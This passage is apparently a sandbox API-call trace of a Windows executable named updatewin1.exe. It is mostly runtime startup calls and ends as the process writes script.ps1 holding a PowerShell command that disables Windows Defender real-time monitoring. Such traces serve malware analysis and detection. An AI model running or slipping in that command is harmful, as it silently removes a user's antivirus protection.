(hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0182.434] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0182.438] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0182.485] atexit (param_1=0x5563e0) returned 0 [0182.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0xa02fad20, dwHighDateTime=0x1d60e72)) [0182.485] GetCurrentThreadId () returned 0xa00 [0182.485] GetCurrentProcessId () returned 0xb04 [0182.485] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=30249619006) returned 1 [0182.485] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0182.485] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.486] GetLastError () returned 0x57 [0182.486] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.486] GetLastError () returned 0x57 [0182.486] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0182.486] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0182.486] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.486] GetLastError () returned 0x57 [0182.486] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0182.486] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0182.486] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.486] GetLastError () returned 0x57 [0182.486] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.487] GetLastError () returned 0x57 [0182.487] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0182.487] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0182.487] GetProcessHeap () returned 0x540000 [0182.487] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.487] GetLastError () returned 0x57 [0182.488] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0182.488] GetLastError () returned 0x57 [0182.488] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0182.488] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x364) returned 0x56a9f0 [0182.488] SetLastError (dwErrCode=0x57) [0182.488] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xc00) returned 0x56ad60 [0182.491] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xaaa48943, hStdError=0xfffffffe)) [0182.491] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0182.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0182.492] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0182.492] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" --Admin" [0182.492] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" --Admin" [0182.492] IsValidCodePage (CodePage=0x4e4) returned 1 [0182.492] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0182.492] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0182.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0182.492] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0182.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0182.492] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0182.492] GetLastError () returned 0x57 [0182.493] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0182.493] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0182.493] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0182.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9b,ýªHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0182.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0182.493] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0182.493] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0182.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9b,ýªHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0182.493] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x56a0d8 [0182.493] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe")) returned 0x5f [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xdc) returned 0x56c168 [0182.494] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0182.494] GetLastError () returned 0x0 [0182.494] GetEnvironmentStringsW () returned 0x56c250* [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaca) returned 0x56cd28 [0182.494] FreeEnvironmentStringsW (penv=0x56c250) returned 1 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x98) returned 0x56c250 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3e) returned 0x56c2f0 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x6c) returned 0x56c338 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x6e) returned 0x56c3b0 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x78) returned 0x551188 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x62) returned 0x56c428 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x5552d8 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x56c498 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x28) returned 0x56a160 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1a) returned 0x56bd18 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x4a) returned 0x56c4e8 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x72) returned 0x551208 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x555310 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x555348 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1c) returned 0x56bd40 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd2) returned 0x56c540 [0182.494] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x7c) returned 0x56c620 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x56c6a8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3a) returned 0x56c6e8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x90) returned 0x56c730 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x56c7c8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x555380 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x56c7f8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x56c838 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x52) returned 0x56c888 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x56d818 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x82) returned 0x56c8e8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x5553b8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x56bd68 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2c) returned 0x5553f0 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x54) returned 0x56c978 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x52) returned 0x56c9d8 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2a) returned 0x555428 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x56d860 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x54) returned 0x56ca38 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x56ca98 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x555460 [0182.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x8c) returned 0x56cac8 [0182.495] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56cd28 | out: hHeap=0x540000) returned 1 [0182.496] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x800) returned 0x56cb60 [0182.496] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0182.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0182.497] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0182.497] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" --Admin" [0182.497] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x56d368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" [0182.497] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0182.508] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0182.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0182.509] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0182.509] lstrlenA 